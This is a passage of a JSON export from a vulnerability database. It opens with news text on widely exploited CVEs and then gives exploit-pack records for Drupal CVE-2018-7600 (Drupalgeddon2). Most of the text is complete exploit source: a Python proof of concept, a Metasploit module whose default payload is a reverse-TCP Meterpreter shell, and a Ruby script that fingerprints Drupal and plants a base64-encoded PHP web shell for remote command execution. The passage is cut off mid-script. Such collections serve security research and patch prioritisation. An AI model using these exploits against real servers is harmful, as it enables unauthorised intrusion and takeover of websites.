of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "title": "Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "href": "", "sourceData": "#!/usr/bin/env\nimport sys\nimport requests\n\nprint ('################################################################')\nprint ('# Proof-Of-Concept for CVE-2018-7600')\nprint ('# by Vitalii Rudnykh')\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\nprint ('# https://github.com/a2u/CVE-2018-7600')\nprint ('################################################################')\nprint ('Provided only for educational or information purposes\\n')\n\ntarget = input('Enter target url (example: https://domain.ltd/): ')\n\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\n# set verify = False if your proxy certificate is self signed\n# remember to set proxies both for http and https\n# \n# example:\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n# verify = False\nproxies = {}\nverify = True\n\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\n\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\ncheck = requests.get(target + 'hello.txt')\nif check.status_code != 200:\n sys.exit(\"Not exploitable\")\nprint ('\\nCheck: '+target+'hello.txt')", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-17T00:00:00", "title": "Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "EXPLOITPACK:E563140BD918794B55F61FC55941120F", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n \n include Msf::Exploit::Remote::HttpClient\n \n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Drupalgeddon2',\n 'Description' => %q{\n CVE-2018-7600 / SA-CORE-2018-002\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\n allows remote attackers to execute arbitrary code because of an issue affecting\n multiple subsystems with default or common module configurations.\n\n The module can load msf PHP arch payloads, using the php/base64 encoder.\n\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Vitalii Rudnykh', # initial PoC\n 'Hans Topo', # further research and ruby port\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\n ],\n 'References' =>\n [\n ['SA-CORE', '2018-002'],\n ['CVE', '2018-7600'],\n ],\n 'DefaultOptions' =>\n {\n 'encoder' => 'php/base64',\n 'payload' => 'php/meterpreter/reverse_tcp',\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => [ARCH_PHP],\n 'Targets' =>\n [\n ['User register form with exec', {}],\n ],\n 'DisclosureDate' => 'Apr 15 2018',\n 'DefaultTarget' => 0\n ))\n \n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\n ])\n \n register_advanced_options(\n [\n\n ])\n end\n \n def uri_path\n normalize_uri(target_uri.path)\n end\n\n def exploit_user_register\n data = Rex::MIME::Message.new\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\n post_data = data.to_s\n\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{uri_path}user/register\",\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data,\n 'vars_get' => {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => '1',\n '_wrapper_format' => 'drupal_ajax',\n }\n })\n end\n \n ##\n # Main\n ##\n \n def exploit\n case datastore['TARGET']\n when 0\n exploit_user_register\n else\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\n end\n end\n end", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "title": "Drupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "href": "", "sourceData": "#!/usr/bin/env ruby\n#\n# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\n#\n# Authors:\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\n#\n\n\nrequire 'base64'\nrequire 'json'\nrequire 'net/http'\nrequire 'openssl'\nrequire 'readline'\nrequire 'highline/import'\n\n\n# Settings - Try to write a PHP to the web root?\ntry_phpshell = true\n# Settings - General/Stealth\n$useragent = \"drupalgeddon2\"\nwebshell = \"shell.php\"\n# Settings - Proxy information (nil to disable)\n$proxy_addr = nil\n$proxy_port = 8080\n\n\n# Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)\nbashcmd = \"<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }\"\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Function http_request <url> [type] [data]\ndef http_request(url, type=\"get\", payload=\"\", cookie=\"\")\n puts verbose(\"HTTP - URL : #{url}\") if $verbose\n puts verbose(\"HTTP - Type: #{type}\") if $verbose\n puts verbose(\"HTTP - Data: #{payload}\") if not payload.empty? and $verbose\n\n begin\n uri = URI(url)\n request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)\n request.initialize_http_header({\"User-Agent\" => $useragent})\n request.initialize_http_header(\"Cookie\" => cookie) if not cookie.empty?\n request.body = payload if not payload.empty?\n return $http.request(request)\n rescue SocketError\n puts error(\"Network connectivity issue\")\n rescue Errno::ECONNREFUSED => e\n puts error(\"The target is down ~ #{e.message}\")\n puts error(\"Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...\") if $proxy_addr\n rescue Timeout::Error => e\n puts error(\"The target timed out ~ #{e.message}\")\n end\n\n # If we got here, something went wrong.\n exit\nend\n\n\n# Function gen_evil_url <cmd> [method] [shell] [phpfunction]\ndef gen_evil_url(evil, element=\"\", shell=false, phpfunction=\"passthru\")\n puts info(\"Payload: #{evil}\") if not shell\n puts verbose(\"Element : #{element}\") if not shell and not element.empty? and $verbose\n puts verbose(\"PHP fn : #{phpfunction}\") if not shell and $verbose\n\n # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render\n # Check the version to match the payload\n if $drupalverion.start_with?(\"8\") and element == \"mail\"\n # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200\n url = $target + $clean_url + $form + \"?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpfunction + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\n\n elsif $drupalverion.start_with?(\"8\") and element == \"timezone\"\n # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru\n url = $target + $clean_url + $form + \"?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=\" + phpfunction + \"&timezone[a][#lazy_builder][][]=\" + evil\n\n #puts warning(\"WARNING: May benefit to use a PHP web shell\") if not try_phpshell and phpfunction != \"passthru\"\n\n elsif $drupalverion.start_with?(\"7\") and element == \"name\"\n # Method #3 - Drupal v7.x: name, #post_render - HTTP 200\n url = $target + \"#{$clean_url}#{$form}&name[%23post_render][]=\" + phpfunction + \"&name[%23type]=markup&name[%23markup]=\" + evil\n payload = \"form_id=user_pass&_triggering_element_name=name\"\n end\n\n # Drupal v7.x needs an extra value from a form\n if $drupalverion.start_with?(\"7\")\n response = http_request(url, \"post\", payload, $session_cookie)\n\n form_name = \"form_build_id\"\n puts verbose(\"Form name : #{form_name}\") if $verbose\n\n form_value = response.body.match(/input type=\"hidden\" name=\"#{form_name}\" value=\"(.*)\"/).to_s.slice(/value=\"(.*)\"/, 1).to_s.strip\n puts warning(\"WARNING: Didn't detect #{form_name}\") if form_value.empty?\n puts verbose(\"Form value : #{form_value}\") if $verbose\n\n url = $target + \"#{$clean_url}file/ajax/name/%23value/\" + form_value\n payload = \"#{form_name}=#{form_value}\"\n end\n\n return url, payload\nend\n\n\n# Function clean_result <input>\ndef clean_result(input)\n #result = JSON.pretty_generate(JSON[response.body])\n #result = $drupalverion.start_with?(\"8\")? JSON.parse(clean)[0][\"data\"] : clean\n clean = input.to_s.strip\n\n # PHP function: passthru\n # For: <payload>[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n clean.slice!(/\\[{\"command\":\".*}\\]$/)\n\n # PHP function: exec\n # For: [{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"<payload>\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n #clean.slice!(/\\[{\"command\":\".*data\":\"/)\n #clean.slice!(/\\\\u003Cspan class=\\\\u0022.*}\\]$/)\n\n # Newer PHP for an older Drupal\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\n #clean.slice!(/<b>.*<br \\/>/)\n\n # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500\n # For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />\n clean.slice!(/The website encountered an unexpected error.*/)\n\n return clean\nend\n\n\n# Feedback when something goes right\ndef success(text)\n # Green\n return \"\\e[#{32}m[+]\\e[0m #{text}\"\nend\n\n# Feedback when something goes wrong\ndef error(text)\n # Red\n return \"\\e[#{31}m[-]\\e[0m #{text}\"\nend\n\n# Feedback when something may have issues\ndef warning(text)\n # Yellow\n return \"\\e[#{33}m[!]\\e[0m #{text}\"\nend\n\n# Feedback when something doing something\ndef action(text)\n # Blue\n return \"\\e[#{34}m[*]\\e[0m #{text}\"\nend\n\n# Feedback with helpful information\ndef info(text)\n # Light blue\n return \"\\e[#{94}m[i]\\e[0m #{text}\"\nend\n\n# Feedback for the overkill\ndef verbose(text)\n # Dark grey\n return \"\\e[#{90}m[v]\\e[0m #{text}\"\nend\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef init_authentication()\n $uname = ask('Enter your username: ') { |q| q.echo = false }\n $passwd = ask('Enter your password: ') { |q| q.echo = false }\n $uname_field = ask('Enter the name of the username form field: ') { |q| q.echo = true }\n $passwd_field = ask('Enter the name of the password form field: ') { |q| q.echo = true }\n $login_path = ask('Enter your login path (e.g., user/login): ') { |q| q.echo = true }\n $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ') { |q| q.echo = true }\nend\n\ndef is_arg(args, param)\n args.each do |arg|\n if arg == param\n return true\n end\n end\n return false\nend\n\n\n# Quick how to use\ndef usage()\n puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'\n puts 'Example for target that does not require authentication:'\n puts ' ruby drupalgeddon2.rb https://example.com'\n puts 'Example for target that does require authentication:'\n puts ' ruby drupalgeddon2.rb https://example.com --authentication'\nend\n\n\n# Read in values\nif ARGV.empty?\n usage()\n exit\nend\n\n$target = ARGV[0]\ninit_authentication() if is_arg(ARGV, '--authentication')\n$verbose = is_arg(ARGV, '--verbose')\n\n\n# Check input for protocol\n$target = \"http://#{$target}\" if not $target.start_with?(\"http\")\n# Check input for the end\n$target += \"/\" if not $target.end_with?(\"/\")\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Banner\nputs action(\"--==[::#Drupalggedon2::]==--\")\nputs \"-\"*80\nputs info(\"Target : #{$target}\")\nputs info(\"Proxy : #{$proxy_addr}:#{$proxy_port}\") if $proxy_addr\nputs info(\"Write? : Skipping writing PHP web shell\") if not try_phpshell\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Setup connection\nuri = URI($target)\n$http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)\n\n# Use SSL/TLS if needed\nif uri.scheme == \"https\"\n $http.use_ssl = true\n $http.verify_mode = OpenSSL::SSL::VERIFY_NONE\nend\n\n$session_cookie = ''\n# If authentication required then login and get session cookie\nif $uname\n $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix\n response = http_request($target + $login_path, 'post', $payload, $session_cookie)\n if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie']\n $session_cookie = response['set-cookie'].split('; ')[0]\n puts success(\"Logged in - Session Cookie : #{$session_cookie}\")\n end\n\nend\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Try and get version\n$drupalverion = \"\"\n\n# Possible URLs\nurl = [\n # --- changelog ---\n # Drupal v6.x / v7.x [200]\n $target + \"CHANGELOG.txt\",\n # Drupal v8.x [200]\n $target + \"core/CHANGELOG.txt\",\n\n # --- bootstrap ---\n # Drupal v7.x / v6.x [403]\n $target + \"includes/bootstrap.inc\",\n # Drupal v8.x [403]\n $target + \"core/includes/bootstrap.inc\",\n\n # --- database ---\n # Drupal v7.x / v6.x [403]\n $target + \"includes/database.inc\",\n # Drupal v7.x [403]\n #$target + \"includes/database/database.inc\",\n # Drupal v8.x [403]\n #$target + \"core/includes/database.inc\",\n\n # --- landing page ---\n # Drupal v8.x / v7.x [200]\n $target,\n]\n\n# Check all\nurl.each do|uri|\n # Check response\n response = http_request(uri, 'get', '', $session_cookie)\n\n # Check header\n if response['X-Generator'] and $drupalverion.empty?\n header = response['X-Generator'].slice(/Drupal (.*) \\(https:\\/\\/www.drupal.org\\)/, 1).to_s.strip\n\n if not header.empty?\n $drupalverion = \"#{header}.x\" if $drupalverion.empty?\n puts success(\"Header : v#{header} [X-Generator]\")\n puts verbose(\"X-Generator: #{response['X-Generator']}\") if $verbose\n end\n end\n\n # Check request response, valid\n if response.code == \"200\"\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\n\n # Check to see if it says: The requested URL \"http://<URL>\" was not found on this server.\n puts warning(\"WARNING: Could be a false-positive [1-1], as the file could be reported to be missing\") if response.body.downcase.include? \"was not found on this server\"\n\n # Check to see if it says: <h1 class=\"js-quickedit-page-title title page-title\">Page not found</h1> <div class=\"content\">The requested page could not be found.</div>\n puts warning(\"WARNING: Could be a false-positive [1-2], as the file could be reported to be missing\") if response.body.downcase.include? \"the requested page could not be found\"\n\n # Only works for CHANGELOG.txt\n if uri.match(/CHANGELOG.txt/)\n # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x\n puts warning(\"WARNING: Unable to detect keyword 'drupal.org'\") if not response.body.downcase.include? \"drupal.org\"\n\n # Patched already? (For Drupal v8.4.x / v7.x)\n puts warning(\"WARNING: Might be patched! Found SA-CORE-2018-002: #{url}\") if response.body.include? \"SA-CORE-2018-002\"\n\n # Try and get version from the file contents (For Drupal v8.4.x / v7.x)\n $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip\n\n # Blank if not valid\n $drupalverion = \"\" if not $drupalverion[-1] =~ /\\d/\n end\n\n # Check meta tag\n if not response.body.empty?\n # For Drupal v8.x / v7.x\n meta = response.body.match(/<meta name=\"Generator\" content=\"Drupal (.*) /)\n metatag = meta.to_s.slice(/meta name=\"Generator\" content=\"Drupal (.*) \\(http/, 1).to_s.strip\n\n if not metatag.empty?\n $drupalverion = \"#{metatag}.x\" if $drupalverion.empty?\n puts success(\"Metatag: v#{$drupalverion} [Generator]\")\n puts verbose(meta.to_s) if $verbose\n end\n end\n\n # Done! ...if a full known version, else keep going... may get lucky later!\n break if not $drupalverion.end_with?(\"x\") and not $drupalverion.empty?\n end\n\n # Check request response, not allowed\n if response.code == \"403\" and $drupalverion.empty?\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\n\n if $drupalverion.empty?\n # Try and get version from the URL (For Drupal v.7.x/v6.x)\n $drupalverion = uri.match(/includes\\/database.inc/)? \"7.x/6.x\" : \"\" if $drupalverion.empty?\n # Try and get version from the URL (For Drupal v8.x)\n $drupalverion = uri.match(/core/)? \"8.x\" : \"\" if $drupalverion.empty?\n\n # If we got something, show it!\n puts success(\"URL : v#{$drupalverion}?\") if not $drupalverion.empty?\n end\n\n else\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\n puts warning(\"MISSING: #{uri} (HTTP Response: #{response.code})#{tmp}\")\n end\nend\n\n\n# Feedback\nif not $drupalverion.empty?\n status = $drupalverion.end_with?(\"x\")? \"?\" : \"!\"\n puts success(\"Drupal#{status}: v#{$drupalverion}\")\nelse\n puts error(\"Didn't detect Drupal version\")\n exit\nend\n\nif not $drupalverion.start_with?(\"8\") and not $drupalverion.start_with?(\"7\")\n puts error(\"Unsupported Drupal version (#{$drupalverion})\")\n exit\nend\nputs \"-\"*80\n\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n\n# The attack vector to use\n$form = $drupalverion.start_with?(\"8\")? \"user/register\" : \"user/password\"\n\n# Make a request, check for form\nurl = \"#{$target}?q=#{$form}\"\nputs action(\"Testing: Form (#{$form})\")\nresponse = http_request(url, 'get', '', $session_cookie)\nif response.code == \"200\" and not response.body.empty?\n puts success(\"Result : Form valid\")\nelsif response['location']\n puts error(\"Target is NOT exploitable [5] (HTTP Response: #{response.code})... Could try following the redirect: #{response['location']}\")\n exit\nelsif response.code == \"404\"\n puts error(\"Target is NOT exploitable [4] (HTTP Response: #{response.code})... Form disabled?\")\n exit\nelsif response.code == \"403\"\n puts error(\"Target is NOT exploitable [3] (HTTP Response: #{response.code})... Form blocked?\")\n exit\nelsif response.body.empty?\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\n exit\nelse\n puts warning(\"WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})\")\nend\n\n\nputs \"- \"*40\n\n\n# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register\n# Drupal v7.x needs it anyway\n$clean_url = $drupalverion.start_with?(\"8\")? \"\" : \"?q=\"\nurl = \"#{$target}#{$form}\"\n\nputs action(\"Testing: Clean URLs\")\nresponse = http_request(url, 'get', '', $session_cookie)\nif response.code == \"200\" and not response.body.empty?\n puts success(\"Result : Clean URLs enabled\")\nelse\n $clean_url = \"?q=\"\n puts warning(\"Result : Clean URLs disabled (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n\n # Drupal v8.x needs it to be enabled\n if $drupalverion.start_with?(\"8\")\n puts error(\"Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE\")\n exit\n elsif $drupalverion.start_with?(\"7\")\n puts info(\"Isn't an issue for Drupal v7.x\")\n end\nend\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Values in gen_evil_url for Drupal v8.x\nelementsv8 = [\n \"mail\",\n \"timezone\",\n]\n# Values in gen_evil_url for Drupal v7.x\nelementsv7 = [\n \"name\",\n]\n\nelements = $drupalverion.start_with?(\"8\") ? elementsv8 : elementsv7\n\nelements.each do|e|\n $element = e\n\n # Make a request, testing code execution\n puts action(\"Testing: Code Execution (Method: #{$element})\")\n\n # Generate a random string to see if we can echo it\n random = (0...8).map { (65 + rand(26)).chr 